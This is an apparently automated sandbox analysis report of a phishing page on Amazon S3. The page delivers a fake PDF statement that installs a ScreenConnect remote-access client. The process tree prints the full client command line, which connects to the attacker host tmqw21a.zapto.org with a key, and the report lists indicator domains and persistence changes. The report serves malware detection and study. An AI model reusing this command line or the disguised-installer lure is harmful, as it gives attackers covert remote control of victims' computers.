
Windows Analysis Report
https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html

Overview

General Information

Sample URL: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
Analysis ID: 1563384

Detection

ScreenConnect Tool
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe (PID: 7888 cmdline: "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe" MD5: BC18A1EC3E55E1646E34A755AB33F245)
      • msiexec.exe (PID: 7956 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1608 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3736 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7344 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 1948 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7404 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 7992 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 8092 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8160 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7232 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 3928 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&i=Amazon" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 6412 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • rundll32.exe (PID: 1940 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
Source | Rule | Description | Author | Strings
C:\Windows\Installer\MSI719A.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\Downloads\Unconfirmed 701254.crdownload | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000C.00000002.1484985430.0000000005D20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000014.00000000.1517220896.0000000000A72000.00000002.00000001.01000000.00000013.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000C.00000000.1466317560.00000000009A6000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000C.00000002.1476357184.0000000003441000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000014.00000002.2397940469.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7992, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6512, ProcessName: svchost.exe
                      No Suricata rule has matched

Source: https://electroagrotech.com.ua/wp-content/uploads/elementor/css/ HTTP Parser: Base64 decoded: {"bulletin_link_id":100,"uri":"bp2:click","bulletin_id":"20220807.61905161","url":"https://www.ssa.gov/?utm_campaign=oest-workloadmanage-22&utm_content=logo&utm_medium=email&utm_source=govdelivery"}
Source: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\svchost.exe File opened: d:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Windows\System32\svchost.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:

                      Networking

Source: C:\Windows\System32\msiexec.exe Registry value created: NULL Service
Source: global traffic DNS traffic detected: DNS query: cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: silvervalleyrealestategh.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: electroagrotech.com.ua
Source: global traffic DNS traffic detected: DNS query: ci3.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: rjpanelplus.top
Source: global traffic DNS traffic detected: DNS query: tmqw21a.zapto.org

                      Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4e6ecb.msi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI719A.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI71AB.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI73FE.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4e6ecd.msi
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Installer\wix{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}.SchedServiceConfig.rmi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}\DefaultIcon
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI71AB.tmp
Source: classification engine Classification label: mal64.evad.win@49/41@23/135
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1956:120:WilError_03
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\svchost.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe"
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&i=Amazon"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe"
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User"
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
